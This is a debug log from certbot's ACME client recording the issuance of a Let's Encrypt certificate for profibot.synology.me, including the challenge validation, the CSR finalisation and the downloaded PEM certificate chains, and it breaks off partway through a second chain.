"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWVwcEFqNkdqUFZTT1JnbVlqdHhUT25uQkliVGZvNl9iTG1wT2hyaWZzeEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNTkzMDc0OTM2Lzdja2p3dyJ9", + "signature": "Hj49FONBszLn__REtRIRBX2Kdfwj-q3aosVsMIgR_khvDLJcs8eWoQAB-68mxUzoT1tKemixMm-KJhPEPgpd1zJ91nlq_cUEf0kJLXvXzKelNDlLl4y1t3SIt2VJhEeF_aYeBzYkmrvEa_rrm462Fa-hirj99bj657Uyf8_Pt18zJVrMw0TQPXnvXCqT7dIs62sZGcuTCyP31MuJT10IcEL6i7AGJGMmCssa5PuMJ69K2jQ2wfDY-ZF5bSgo7EN6XVvJVCqSzKYTVaCr1YtEs5q4QizQXW7F7GoENMGcDN6Zd5N_qA5DYCE9F9tZVL2kTxhWvPDYCzeXB5SlfBDQFw", + "payload": "e30" +} +2025-12-25 00:45:15,933:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632593074936/7ckjww HTTP/1.1" 200 195 +2025-12-25 00:45:15,934:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:15 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/7ckjww +Replay-Nonce: 58tS3qjE3ksN2fusCl7m4Asl4bNNA0se9_HFpoQV-TcVdWKFb1c +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/7ckjww", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" +} +2025-12-25 00:45:15,935:DEBUG:acme.client:Storing nonce: 58tS3qjE3ksN2fusCl7m4Asl4bNNA0se9_HFpoQV-TcVdWKFb1c +2025-12-25 00:45:15,936:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-25 00:45:16,936:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:45:16,940:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632593074936: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRTNrc04yZnVzQ2w3bTRBc2w0Yk5OQTBzZTlfSEZwb1FWLVRjVmRXS0ZiMWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTkzMDc0OTM2In0", + "signature": "cQy0FB4889CzmpwjcRQisazZMGNe1BY6ndY3aTlvJkmF4_-AQuJ1HSpAPgTBsUOxfZLuj7ldyJxt43bhN2LGl-pS0X1kZeFQOrL9tE0MlGj9BZZi7OHymCuMIYHj8cODhMtwCyD_q4NdjfKyL-F58W6TOHTiLZo-__y4oFBAH_3Y5XmKB3oEPdrYN6VYQZfZKtpiQLgLetdWNKjWIXwe9MazI3cXjlBj8e6rfCj24SnVSp5t6-sdpmrUJXTGhbgTj3aWAMH48eli8AFZdUOSV8K1lMvktwFIdUR_vaxLDq0im5h0KePwrTOSHToQEDym6C5g6sSPVOwrDtg0f4dD8A", + "payload": "" +} +2025-12-25 00:45:17,098:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632593074936 HTTP/1.1" 200 828 +2025-12-25 00:45:17,098:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:17 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJrZog6TRl93Mz0BDgkHmlCGhifx_LtImHhK01QvN1GeI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "profibot.synology.me" + }, + "status": "pending", + "expires": "2026-01-01T00:45:15Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/F-gr-Q", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/7ckjww", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/hh1ZKg", + "status": "pending", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0" + } + ] +} +2025-12-25 00:45:17,099:DEBUG:acme.client:Storing nonce: fULB7aUJrZog6TRl93Mz0BDgkHmlCGhifx_LtImHhK01QvN1GeI +2025-12-25 00:45:17,099:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/F-gr-Q', 'status': 'pending', 'token': '3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0'} +2025-12-25 00:45:20,099:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:45:20,103:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632593074936: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnJab2c2VFJsOTNNejBCRGdrSG1sQ0doaWZ4X0x0SW1IaEswMVF2TjFHZUkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTkzMDc0OTM2In0", + "signature": "c4w46yPHSu0azc-WIN9OeSW202bbYqEUlB6CenY-icU4Ix3QUOxzcWEQwKrB6iZFS4-L5RpPReoXH77A2GazB6_pnG8QoZBRcx1DsPuu76yaovmnR14GpfmtWbSFnQDa5HAAtNiXxD4wTOGQScYdbp1vzuMgLlPUOX9WQ4V1_S09jUtbiL_52yMeNbPinetB1RIfqLqx2iM4IDzPz38MfF_BzyCom_VFIn4fnRGz6f4AeHE6U3IuCFADtMpon44r0ufhacgxXT4gtGhFcMgLK2VIfl2K3ksUAYdngCBpWptzVjZTj7ThlhqQchLskhN0OgFDnxN7v31roESoQdBdHQ", + "payload": "" +} +2025-12-25 00:45:20,259:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632593074936 HTTP/1.1" 200 785 +2025-12-25 00:45:20,260:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:20 GMT +Content-Type: application/json +Content-Length: 785 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJ0HRQNhf743iqjk1qmIzuP8C_ShWAGNL40iUq8GeLQXA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "profibot.synology.me" + }, + "status": "valid", + "expires": "2026-01-24T00:45:17Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632593074936/7ckjww", + "status": "valid", + "validated": "2025-12-25T00:45:15Z", + "token": "3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0", + "validationRecord": [ + { + "url": "http://profibot.synology.me/.well-known/acme-challenge/3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0", + "hostname": "profibot.synology.me", + "port": "80", + "addressesResolved": [ + "92.249.165.228" + ], + "addressUsed": "92.249.165.228" + } + ] + } + ] +} +2025-12-25 00:45:20,261:DEBUG:acme.client:Storing nonce: fULB7aUJ0HRQNhf743iqjk1qmIzuP8C_ShWAGNL40iUq8GeLQXA +2025-12-25 00:45:20,262:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-25 00:45:20,262:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-25 00:45:20,262:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/3p0V9lXhAarnKZPWlIMssUq9-LRtuHeqJw1pKt2nm_0 +2025-12-25 00:45:20,263:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-25 00:45:20,263:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKjCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAES76MaJ1SVjNnIOki\nD4nMJyugIJlBmTVDiZfSw616pmLBGQbxHnbmVDU7xH0eiTfGNTOxEIiMaWPEiiyd\n70OQQiYFHc0QJW47HlPSnt547rCNxuUbgzFIYN0o/OEb3F5MoDIwMAYJKoZIhvcN\nAQkOMSMwITAfBgNVHREEGDAWghRwcm9maWJvdC5zeW5vbG9neS5tZTAKBggqhkjO\nPQQDAgNoADBlAjEA4hfpRlOsPsiEfcTd1RmhjKCuwczvRJRKD7TyTOnzTuwsn29o\nMBL1ScMC6xa2dwE0AjAWfRG/F3nz+O4j9l4l2QkjWyL1OzuPzpEX4DDALhSBCyjO\nUOqLEDSnmbkblJNwjL8=\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2025-12-25 00:45:20,264:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2025-12-25 00:46:50.264445 +2025-12-25 00:45:20,265:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBKjCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAES76MaJ1SVjNnIOkiD4nMJyugIJlBmTVDiZfSw616pmLBGQbxHnbmVDU7xH0eiTfGNTOxEIiMaWPEiiyd70OQQiYFHc0QJW47HlPSnt547rCNxuUbgzFIYN0o_OEb3F5MoDIwMAYJKoZIhvcNAQkOMSMwITAfBgNVHREEGDAWghRwcm9maWJvdC5zeW5vbG9neS5tZTAKBggqhkjOPQQDAgNoADBlAjEA4hfpRlOsPsiEfcTd1RmhjKCuwczvRJRKD7TyTOnzTuwsn29oMBL1ScMC6xa2dwE0AjAWfRG_F3nz-O4j9l4l2QkjWyL1OzuPzpEX4DDALhSBCyjOUOqLEDSnmbkblJNwjL8"\n}' +2025-12-25 00:45:20,269:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462377721906: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjBIUlFOaGY3NDNpcWprMXFtSXp1UDhDX1NoV0FHTkw0MGlVcThHZUxRWEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDYyMzc3NzIxOTA2In0", + "signature": "ikMwNaspH-6CPdgwDBXAFj-8W_OfXS1I00h4kpmrkAdSqBVe8pdbRhYaJprftqR7RxBezJ2-hEGE8FD2PMd7JZT0TPPngIzP3A7xneK9P6JFYPqBlluRVLV-eB4l0ikoud3WslbUcluhqBU6QWw3-S40tlaP8cySmzoSDC7g62d8uhn1YMEyVKDGq8e4B3aTdrf0dUAD7V-bW2VlCehpUYDNsC_LYbD99nsc_6O9Owu9RhmVRioB7DJvNBqucRT6u84auJBqvq6kYY5x8A5Ceddv73-4Ru1gnhjwzkoBlutPfAv76WJT1GmgwyCNPSygbLOPBnHrwybCHdFr1qJoaQ", + "payload": "ewogICJjc3IiOiAiTUlJQktqQ0JzUUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFUzc2TWFKMVNWak5uSU9raUQ0bk1KeXVnSUpsQm1UVkRpWmZTdzYxNnBtTEJHUWJ4SG5ibVZEVTd4SDBlaVRmR05UT3hFSWlNYVdQRWlpeWQ3ME9RUWlZRkhjMFFKVzQ3SGxQU250NTQ3ckNOeHVVYmd6RklZTjBvX09FYjNGNU1vREl3TUFZSktvWklodmNOQVFrT01TTXdJVEFmQmdOVkhSRUVHREFXZ2hSd2NtOW1hV0p2ZEM1emVXNXZiRzluZVM1dFpUQUtCZ2dxaGtqT1BRUURBZ05vQURCbEFqRUE0aGZwUmxPc1BzaUVmY1RkMVJtaGpLQ3V3Y3p2UkpSS0Q3VHlUT256VHV3c24yOW9NQkwxU2NNQzZ4YTJkd0UwQWpBV2ZSR19GM256LU80ajlsNGwyUWtqV3lMMU96dVB6cEVYNEREQUxoU0JDeWpPVU9xTEVEU25tYmtibEpOd2pMOCIKfQ" +} +2025-12-25 00:45:20,631:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/462377721906 HTTP/1.1" 200 456 +2025-12-25 00:45:20,632:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:20 GMT +Content-Type: application/json +Content-Length: 456 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462377721906 +Replay-Nonce: fULB7aUJ-rH_OyCE-E5ZtJhanuxXdsHOQkkbSXV2g34Z7ssu4O8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T00:45:15Z", + "identifiers": [ + { + "type": "dns", + "value": "profibot.synology.me" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632593074936" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462377721906", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0597509b0af723368ea477bfd2174dcf7252" +} +2025-12-25 00:45:20,633:DEBUG:acme.client:Storing nonce: fULB7aUJ-rH_OyCE-E5ZtJhanuxXdsHOQkkbSXV2g34Z7ssu4O8 +2025-12-25 00:45:21,634:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:45:21,638:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462377721906: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSi1ySF9PeUNFLUU1WnRKaGFudXhYZHNIT1Fra2JTWFYyZzM0Wjdzc3U0TzgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDYyMzc3NzIxOTA2In0", + "signature": "gcH_X0q1A2yItuw5p9D8v_FNJV-xiNtPGOsDa_Vj7Q8tFCwpNswe4pPcD25K_43iZwK44iYsADahAWuEVjaUZ7ly8JjwoT2Ts0-bCb6thf3E2fYtPFVEW1WG9Tv34eukJMRhSw8TpaRq0FylUbNJ3-J076Ts_bVky_V4Fse9-GpLj35e6lt-NIVwoT8Msw-OLqk4rmsV_D7lNhbpWq5XaOKN2Ursw2IHcSBqp_f6l8x352HCAMIZmZ_juBlA5rZxHyPN2XtbyuiFbPQflJ4oVpEwbyL0hPGsPVwiUogFjdE-Fr-TN7NPAo-ZJJY7c818Vh9paLqPsXrxMGR-9WGzlw", + "payload": "" +} +2025-12-25 00:45:21,793:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/462377721906 HTTP/1.1" 200 456 +2025-12-25 00:45:21,794:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:21 GMT +Content-Type: application/json +Content-Length: 456 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462377721906 +Replay-Nonce: fULB7aUJ6xds_j6J3aLi7aB5nQu33v0ceG2CizAWfNcrl61RNxc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T00:45:15Z", + "identifiers": [ + { + "type": "dns", + "value": "profibot.synology.me" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632593074936" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462377721906", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0597509b0af723368ea477bfd2174dcf7252" +} +2025-12-25 00:45:21,795:DEBUG:acme.client:Storing nonce: fULB7aUJ6xds_j6J3aLi7aB5nQu33v0ceG2CizAWfNcrl61RNxc +2025-12-25 00:45:21,795:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:45:21,798:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0597509b0af723368ea477bfd2174dcf7252: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjZ4ZHNfajZKM2FMaTdhQjVuUXUzM3YwY2VHMkNpekFXZk5jcmw2MVJOeGMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU5NzUwOWIwYWY3MjMzNjhlYTQ3N2JmZDIxNzRkY2Y3MjUyIn0", + "signature": "BEpmnLjhcYp7E21eavUoI8vo-GsGLgOZJ8XhJhiZuexrDXmADrUJZXdZPKVxqG0API4qy5QAwuiO4Go7dhRUdstBjCM10THWENshuIkuFMIlA5g0i4T7CTeRTh-MZy8K38ejAWKRxoq1MZq85rOslIfLegwTt8ecG7xa56_Oav7IARUckvZQayW8Hmqttk0w_V5FLhZiK2R1ui22Yl1bOqAJVCHyJacqMSUAf5T45YStIs7IQKRcQ0_dhxRgI6cQSNaPrm8_xrdUFAxN7agtuQppfKiTSr0MHAHRl36HVddXgLxsxjHRMmqny0bZPu5HUFXMERnDhf7WoI7tLctDwA", + "payload": "" +} +2025-12-25 00:45:21,969:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0597509b0af723368ea477bfd2174dcf7252 HTTP/1.1" 200 2909 +2025-12-25 00:45:21,970:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:21 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2909 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: fULB7aUJOAh65itDs0Lc840KmzKHKWj2MmYrD9ImQIE_k89dBNU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDszCCAzmgAwIBAgISBZdQmwr3IzaOpHe/0hdNz3JSMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNTEyMjQyMzQ2NTBaFw0yNjAzMjQyMzQ2NDlaMB8xHTAbBgNVBAMTFHBy +b2ZpYm90LnN5bm9sb2d5Lm1lMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAES76MaJ1S +VjNnIOkiD4nMJyugIJlBmTVDiZfSw616pmLBGQbxHnbmVDU7xH0eiTfGNTOxEIiM +aWPEiiyd70OQQiYFHc0QJW47HlPSnt547rCNxuUbgzFIYN0o/OEb3F5Mo4ICIzCC +Ah8wDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD +AjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRJtFTgqwPCzZX8gmOZTsOPpQRLHzAf +BgNVHSMEGDAWgBSPDROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQw +IgYIKwYBBQUHMAKGFmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHwYDVR0RBBgwFoIU +cHJvZmlib3Quc3lub2xvZ3kubWUwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0f +BCYwJDAioCCgHoYcaHR0cDovL2U4LmMubGVuY3Iub3JnLzgzLmNybDCCAQUGCisG +AQQB1nkCBAIEgfYEgfMA8QB2AGQRxGykEuyniRyiAi4AvKtPKAfUHjUnq+r+1QPJ +fc3wAAABm1L3po0AAAQDAEcwRQIhAIaBbekiGNH3VwK+0blluRg0ZF+TqlpYNS6n +gHVGknS5AiAlf4XqzsZ7R8ll9kuRuHQSvNJt2oWqbqhO/QYKOYyVvgB3ABaDLavw +qSUPD/A6pUX/yL/II9CHS/YEKSf45x8zE/X6AAABm1L3pssAAAQDAEgwRgIhALO+ +h8r/WKEmISSWiJN9NultaFsjdoo48Av1kaCIFr1qAiEAqagsPtEZaBoP3o2PjCiK +TaRpmAlz01MHB33/KtY+ypcwCgYIKoZIzj0EAwMDaAAwZQIxAJkyq8FKvLC1CccV +suvITXKzeEnMc1sqDeuA7GX7qV8u+uYh2WPhJR4Jmrr0G1Te/AIwan5OaiJCBi1B +mCBKjprv4A9a+nlRZPjDtCahyDSnGdhkDmGrIpmYG2RVFFP/nmQN +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy +Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa +Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF +bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c +S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb +R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB +9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB +MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j +cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB +BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE +DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j +ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 +RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d +AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 +otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA +aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm +Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 +HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 +Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR +xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d +tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ +jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS +u1igv3OefnWjSQ== +-----END CERTIFICATE----- + +2025-12-25 00:45:21,971:DEBUG:acme.client:Storing nonce: fULB7aUJOAh65itDs0Lc840KmzKHKWj2MmYrD9ImQIE_k89dBNU +2025-12-25 00:45:21,971:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:45:21,975:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0597509b0af723368ea477bfd2174dcf7252/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSk9BaDY1aXREczBMYzg0MEttektIS1dqMk1tWXJEOUltUUlFX2s4OWRCTlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU5NzUwOWIwYWY3MjMzNjhlYTQ3N2JmZDIxNzRkY2Y3MjUyLzEifQ", + "signature": "BP722I7eDwHcG3s75hqRmPZpcjOqgw3L5oXlEP_pm9ex4Bs3oPtnemyrnQzSYnx94cKpzldKb2npn36EwAmvPRF-Rlq7aKJDk7HZe5Cm5GM0s_a-VXKN9ACBlFsxmZP8clzb6GD7fhi8JlHbHcawtwJ7rTryqpW9gB4RX-uemW6e0ULYaicPdw10oRdnUvhXg99u55yPjYKXnnK3Q2GkhLr8TODYYrbsxKZuWgJv1MRkYbVYiKLVR1g9pjdi6wD3Bitw-83Wu0-aM4y-3i0zh_anKrriR5DAVvgqwUl0j5RTWAPyxyLXIMrpZJRu8212qFfkemf_d-hQGmk1Db1qOw", + "payload": "" +} +2025-12-25 00:45:22,133:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0597509b0af723368ea477bfd2174dcf7252/1 HTTP/1.1" 200 2344 +2025-12-25 00:45:22,133:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:45:22 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2344 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: fULB7aUJv71UoqiAy7y6JIBGSqx2utdEVh60TA0v0oC7Tlpflm8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDszCCAzmgAwIBAgISBZdQmwr3IzaOpHe/0hdNz3JSMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNTEyMjQyMzQ2NTBaFw0yNjAzMjQyMzQ2NDlaMB8xHTAbBgNVBAMTFHBy +b2ZpYm90LnN5bm9sb2d5Lm1lMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAES76MaJ1S +VjNnIOkiD4nMJyugIJlBmTVDiZfSw616pmLBGQbxHnbmVDU7xH0eiTfGNTOxEIiM +aWPEiiyd70OQQiYFHc0QJW47HlPSnt547rCNxuUbgzFIYN0o/OEb3F5Mo4ICIzCC +Ah8wDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD +AjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRJtFTgqwPCzZX8gmOZTsOPpQRLHzAf +BgNVHSMEGDAWgBSPDROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQw +IgYIKwYBBQUHMAKGFmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHwYDVR0RBBgwFoIU +cHJvZmlib3Quc3lub2xvZ3kubWUwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0f +BCYwJDAioCCgHoYcaHR0cDovL2U4LmMubGVuY3Iub3JnLzgzLmNybDCCAQUGCisG 